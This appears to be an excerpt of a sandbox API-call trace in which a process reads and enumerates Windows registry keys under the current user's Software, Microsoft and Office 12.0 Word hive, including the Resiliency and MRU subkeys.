[0085.255] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File MRU", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Options", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Place MRU", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x0) returned 0x2
[0085.255] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x0) returned 0x2
[0085.256] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.256] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x34c) returned 0x0
[0085.257] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.257] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.258] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x35c) returned 0x0
[0085.258] RegCloseKey (hKey=0x34c) returned 0x0
[0085.258] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.259] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.260] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x34c) returned 0x0
[0085.260] RegCloseKey (hKey=0x35c) returned 0x0
[0085.260] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.260] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x35c) returned 0x0
[0085.260] RegCloseKey (hKey=0x34c) returned 0x0
[0085.260] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.260] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x34c) returned 0x0
[0085.260] RegCloseKey (hKey=0x35c) returned 0x0
[0085.260] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x0) returned 0x2
[0085.260] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x35c) returned 0x0
[0085.261] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.261] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.261] RegCloseKey (hKey=0x35c) returned 0x0
